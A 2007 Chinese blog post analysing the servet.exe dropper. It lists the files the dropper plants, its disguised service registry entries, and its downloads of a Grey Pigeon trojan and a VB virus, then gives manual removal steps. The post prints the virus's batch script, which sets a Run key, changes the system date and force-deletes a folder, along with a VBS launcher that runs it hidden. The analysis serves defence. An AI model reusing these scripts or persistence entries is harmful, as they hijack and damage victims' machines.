清除servet.exe
2007-07-01 18:39:52
|
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章
原始出处 、作者信息和本声明。否则将追究法律责任。
[url]http://gudugengkekao.51cto.com/172212/32592[/url]
|
|
样本来至木蚂蚁社区``有点黄的图标```
其实前星期就分析了``忙着玩游戏``所以懒得写```
今天整理东西的时候翻出来的```西西```
Delphi写的,加了HMYNIS、ASPACK双层硬壳,上周在Visrutotal扫描时过了不少```
运行,释放:
%Systemroot%\system32\servet.exe 29760 字节
并注册为系统服务,实现开机自启:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsDown]
"Type"=dword:00000110 "Start"=dword:00000002 "ErrorControl"=dword:00000000 "ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\ 79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,65,00,72,00,76,00,65,\ 00,74,00,2e,00,65,00,78,00,65,00,00,00 "DisplayName"="Windows InstallService" "ObjectName"="LocalSystem" "Description"="Windows InstallService"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsDown\Security]
"Security"=hex:01,00,14,80,a0,00,00,00,ac,00,00,00,14,00,00,00,30,00,00,00,02,\ 00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\ 00,00,02,00,70,00,04,00,00,00,00,00,18,00,fd,01,02,00,01,01,00,00,00,00,00,\ 05,12,00,00,00,00,00,00,00,00,00,1c,00,ff,01,0f,00,01,02,00,00,00,00,00,05,\ 20,00,00,00,20,02,00,00,00,00,00,00,00,00,18,00,8d,01,02,00,01,01,00,00,00,\ 00,00,05,0b,00,00,00,20,02,00,00,00,00,1c,00,fd,01,02,00,01,02,00,00,00,00,\ 00,05,20,00,00,00,23,02,00,00,00,00,00,00,01,01,00,00,00,00,00,05,12,00,00,\ 00,01,01,00,00,00,00,00,05,12,00,00,00
随后利用Svchost反弹连接,下载2个***:
%Systemroot%\system\11.exe 652604 字节 ,黑防的鸽子``
%Systemroot%\system32\11.exe 719834 字节 VB小毒,MS运行不起来``` - -
那个VB病毒,释放:
%Systemroot%\system32\11.bat 568 字节
内容为:
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v lype /t REG_EXPAND_SZ /d "%systemroot%\avp.exe" /f
set date=%date% date 2000-01-01 @echo off & setlocal enableextensions echo WScript.Sleep 1000 > %system%.\run$.vbs set /a i = 10 :Timeout if %i% == 0 goto Next setlocal set /a i = %i% - 1 cscript //nologo %system%.\ run$.vbs goto Timeout goto End :Next %systemroot%\system\11.exe copy %systemroot%\system\run.pif %systemroot%\system32\ for %%f in (%system%.\run$.vbs*) do del %%f date %date% RD /S /Q %systemroot%\system\
%Systemroot%\system\11.vbs 137 字节
内容为:
DIM objShell
set objShell=wscript.createObject("wscript.shell") iReturn=objShell.Run("cmd.exe /C %systemroot%\system\11.bat", 0, TRUE)
其实就是一丘之貉``不过并未见释放avp.exe、 run$.vbs和写启动项```
但确实改了日期,修改为2000-01-01(注意,直接挂卡吧)``
还有那个652604 字节的灰鸽子,汗,还要我自己手工运行```(崩溃啊``)
黑防的灰鸽子,蛮不错的,加了免杀,过Visrutotal的Dr、BD、AVG、Ewdio、麦咖啡、NOD32等等``
注册为系统服务:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss]
"Type"=dword:00000110 "Start"=dword:00000002 "ErrorControl"=dword:00000000 "ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\ 79,00,73,00,74,00,65,00,6d,00,73,00,2e,00,65,00,78,00,65,00,00,00 "DisplayName"="smss" "ObjectName"="LocalSystem" "Description"="系统关键进程"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss\Security]
"Security"=hex:01,00,14,80,a0,00,00,00,ac,00,00,00,14,00,00,00,30,00,00,00,02,\ 00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\ 00,00,02,00,70,00,04,00,00,00,00,00,18,00,fd,01,02,00,01,01,00,00,00,00,00,\ 05,12,00,00,00,00,00,00,00,00,00,1c,00,ff,01,0f,00,01,02,00,00,00,00,00,05,\ 20,00,00,00,20,02,00,00,00,00,00,00,00,00,18,00,8d,01,02,00,01,01,00,00,00,\ 00,00,05,0b,00,00,00,20,02,00,00,00,00,1c,00,fd,01,02,00,01,02,00,00,00,00,\ 00,05,20,00,00,00,23,02,00,00,00,00,00,00,01,01,00,00,00,00,00,05,12,00,00,\ 00,01,01,00,00,00,00,00,05,12,00,00,00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss\Enum]
"0"="Root\\LEGACY_SMSS\\0000" "Count"=dword:00000001 "NextInstance"=dword:00000001
并使用Hook技术,实现进程隐藏``,哈哈``SSM可不会“坐视不理”:
随后反弹连接(穿防火墙),SSM拦下了,我放行```
等了一会,没什么举动```实在没耐性(最近很烦躁),删除了``
清除方法:
下载冰刃和SREng
[url]http://222.73.219.7/?SREng.rar_73e4biks5bthsn0cr1bktpnq5bs1b5bt5bitm2biu14z97f14z[/url]" target=_blank 17:01:54?>
SREng.rar 597KB
[url]http://ys-C.ys168.com/?[/url]冰刃(增强版).rar_67ehiks5bths4bsr1bktpnq5bs1b5bt0cl4bt0bku14z97f14z" target=_blank 12:36:27?>
冰刃(增强版).rar 555KB
关闭不必要的进程,断开网络```
1、打开冰刃,看到IE和CMD的进程关掉,还有system.exe(C:\Windows\下的),就是那个灰鸽子``因为是Hook隐藏,所以IS会以红色显示,也把他关闭咯``
2、使用冰刃“文件”功能,删除:
C:\Windows\system\11.exe
C:\Windows\system32\11.exe
C:\Windows\system\11.bat
C:\Windows\system\11.vbs
C:\Windows\system32\servet.exe
C:\Windows\systems.exe
3、打开SREng,删除:
服务
[Windows InstallService / WindowsDown][Stopped/Auto Start]
<C:\winnt\system32\servet.exe><N/A>
[smss / smss][Running/Auto Start]
<C:\winnt\systems.exe><N/A>
OK,然后修改QQ、Mail等密码,重启``完事```
一些PP``:
|
转载于:https://blog.51cto.com/ruxichina/32814
1628
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
